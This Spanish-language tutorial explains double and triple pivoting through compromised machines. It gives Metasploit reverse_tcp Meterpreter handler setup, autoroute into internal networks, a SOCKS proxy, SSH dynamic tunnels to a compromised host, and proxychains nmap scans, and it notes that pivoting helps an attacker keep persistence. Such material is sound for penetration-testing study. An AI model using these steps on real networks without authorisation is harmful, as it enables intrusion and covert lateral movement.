Doble Pivoting y Triple Pivoting

Doble Pivoting:

Utilizar una máquina comprometida para pivotar a una segunda máquina, y luego usar la segunda máquina para pivotar a una tercera.

Triple Pivoting:

Extender el concepto de doble pivoting para incluir una tercera capa de pivote, lo que permite acceder a una red o sistema adicional a través de múltiples máquinas comprometidas.

Importancia del Pivoting

  1. Acceso a Redes Segregadas: Permite acceder a redes internas que están segregadas del punto de entrada inicial, lo cual es común en entornos empresariales.

  2. Movimiento Lateral: Facilita el movimiento lateral dentro de la red, permitiendo comprometer otros sistemas y servicios.

  3. Persistencia: Ayuda a establecer persistencia en la red, permitiendo al atacante mantener el acceso incluso si se detecta y remedia el punto de entrada inicial.

Configuración de Pivoting en Windows y Linux

La configuración de pivoting puede variar dependiendo del sistema operativo de la máquina comprometida. A continuación se detallan los aspectos teóricos y comandos útiles para configurar pivoting en Windows y Linux.

Pivoting en Windows

En Windows, el pivoting a menudo se realiza utilizando herramientas como Metasploit, Netcat, y PowerShell. La configuración de pivotes en Windows se puede dividir en varias etapas:

1. Establecer una Sesión Meterpreter

  • Teoría: Meterpreter es un payload avanzado que se utiliza dentro del framework Metasploit para ejecutar comandos en la máquina objetivo.

  • Comandos:

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST <your_IP>
    set LPORT <your_port>
    exploit

2. Configurar un Route

  • Teoría: La función autoroute de Meterpreter permite agregar rutas a la tabla de enrutamiento, lo que facilita el redireccionamiento del tráfico a través de la máquina comprometida.

  • Comandos:

    meterpreter > run autoroute -s <internal_network>/24

3. Usar Socks Proxy

  • Teoría: Configurar un proxy SOCKS en Metasploit permite enrutar el tráfico de herramientas de red a través de la máquina comprometida.

  • Comandos:

    use auxiliary/server/socks4a
    set SRVHOST 0.0.0.0
    set SRVPORT 1080
    run

4. Configurar ProxyChains

  • Teoría: ProxyChains se utiliza en la máquina atacante para redirigir el tráfico de herramientas de red a través del proxy SOCKS configurado en Metasploit.

  • Comandos:

    echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf
    proxychains nmap -sT -Pn -n -p 80,443 <target_internal_IP>

Pivoting en Linux

En Linux, el pivoting se puede realizar utilizando herramientas como SSH, Netcat, y Metasploit. La configuración de pivotes en Linux también se puede dividir en varias etapas:

1. Establecer un Túnel SSH

  • Teoría: Un túnel SSH se utiliza para redirigir el tráfico a través de una conexión SSH segura.

  • Comandos:

    ssh -D 1080 -q -C -N user@compromised_host

2. Usar ProxyChains

  • Teoría: ProxyChains se utiliza en la máquina atacante para redirigir el tráfico de herramientas de red a través del túnel SSH.

  • Comandos:

    echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf
    proxychains nmap -sT -Pn -n -p 80,443 <target_internal_IP>

3. Configuración de Metasploit

  • Teoría: Meterpreter y autoroute en Metasploit permiten enrutar el tráfico a través de la máquina comprometida.

  • Comandos:

    use exploit/multi/handler
    set payload linux/x86/meterpreter/reverse_tcp
    set LHOST <your_IP>
    set LPORT <your_port>
    exploit
    
    meterpreter > run autoroute -s <internal_network>/24
    
    use auxiliary/server/socks4a
    set SRVHOST 0.0.0.0
    set SRVPORT 1080
    run
    
    echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf
    proxychains nmap -sT -Pn -n -p 80,443 <target_internal_IP>

Comandos Útiles en Cada Sistema Operativo

Windows

  • netstat: Ver las conexiones de red.

    netstat -an
  • route: Ver la tabla de enrutamiento.

    route print
  • ipconfig: Ver la configuración de la red.

    ipconfig /all

Linux

  • ifconfig/ip: Ver y configurar la interfaz de red.

    ifconfig
    ip addr show
  • netstat/ss: Ver las conexiones de red.

    netstat -tulnp
  • route/ip route: Ver la tabla de enrutamiento.

    route -n
    ip route show
  • iptables: Configurar reglas de firewall.

    iptables -L

Última actualización